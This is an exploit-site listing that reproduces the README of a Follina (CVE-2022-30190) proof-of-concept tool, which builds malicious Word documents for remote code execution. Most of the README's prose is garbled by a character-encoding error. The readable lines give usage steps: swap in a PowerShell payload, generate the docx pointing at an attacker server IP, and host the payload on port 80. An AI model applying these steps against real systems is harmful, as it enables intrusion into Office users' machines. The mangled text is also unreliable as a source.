Sploitus

Exploit for CVE-2022-30190 CVE-2021-40444 CVE-2022-30190

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN20 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SUDOAZA-CVE-2022-30190
# MS-MSDT Follina CVE-2022-30190 PoC

Microsoft Office Word рдореЗрдВ рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди (Remote Code Execution) рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг docx рдЬрдирд░реЗрдЯрд░

рдЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдирд┐рд░реНрдорд╛рдг LockedByte рджреНрд╡рд╛рд░рд╛ CVE-2021-40444 PoC рдФрд░ Tothi рджреНрд╡рд╛рд░рд╛ writeup рдкрд░ рдЖрдзрд╛рд░рд┐рдд рд╣реИред

# рдЙрдкрдпреЛрдЧ

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ backup.html рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░реЗрдВ рдФрд░ powershell рдкреЗрд▓реЛрдб рдХреЛ рдмрджрд▓реЗрдВред рдЕрднреА рдпрд╣ рд╕рд┐рд░реНрдл `IEX('calc.exe')` рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ `calc.exe` рдЦреЛрд▓рддрд╛ рд╣реИред

`python3 exploit.py generate http://<SRV IP>`

![рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдирд┐рд░реНрдорд╛рдг](https://assets.kitploit.com/production/public/readmes/32973/50f216e2cb7b5b14248a134207285b8b78c0cd6e6bf2174c09a780a6e18e8830.png)

рдПрдХ рдмрд╛рд░ рдЬрдм рдЖрдк рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг docx рдЙрддреНрдкрдиреНрди рдХрд░ рд▓реЗрдВ (рдпрд╣ `out/` рдкрд░ рд╣реЛрдЧрд╛), рдЖрдк рд╕рд░реНрд╡рд░ рд╕реЗрдЯрдЕрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

`sudo python3 exploit.py host 80`

![рд╕рд░реНрд╡рд░](https://assets.kitploit.com/production/public/readmes/32973/75e812e89bc46ed25596bdca1be40df2c13e11900dd53a9d764fd8b5e7d41e9d.png)